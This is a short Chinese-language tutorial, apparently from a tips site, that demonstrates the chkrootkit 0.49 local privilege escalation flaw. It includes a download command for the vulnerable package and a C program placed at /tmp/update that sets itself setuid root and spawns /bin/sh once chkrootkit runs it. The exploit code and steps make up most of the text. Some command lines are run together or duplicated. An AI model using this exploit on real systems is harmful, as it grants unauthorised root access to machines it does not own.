Chkrootkit <=0.49 Local Root Vulnerability：小于等于0.49版的chrootkit本地提权漏洞。先来演示下吧：

可以查看自己安装的是不是升到最新版了，或者下载有漏洞的版本进行实验：

wget wget http://www.exploit-db.com/wp-content/themes/exploit/applications/304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gztar vfxz 304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gzcd chkrootkit-0.49/

./chkrootkit -V

普通用户在 /tmp 目录下新建 update.c（代码实示例如下）：

#include <unistd.h>

void main(void)

{

system("chown root:root /tmp/update");

system("chmod 4755 /tmp/update");

setuid(0);

setgid(0);

execl("/bin/sh","sh",NULL);

}

然后编译好 update ，看下update的文件详情：

执行有漏洞的 chkrootkit ：

再来看下 update 已经成功属于 root 组了！

以上就是查看自己 Ckrootkit 0.49 是不是安装的是不是升到最新版了，或者下载有漏洞的版本进行实验的步骤，谢谢阅读，希望能帮到大家，请继续关注查字典教程网，我们会努力分享更多优秀的文章。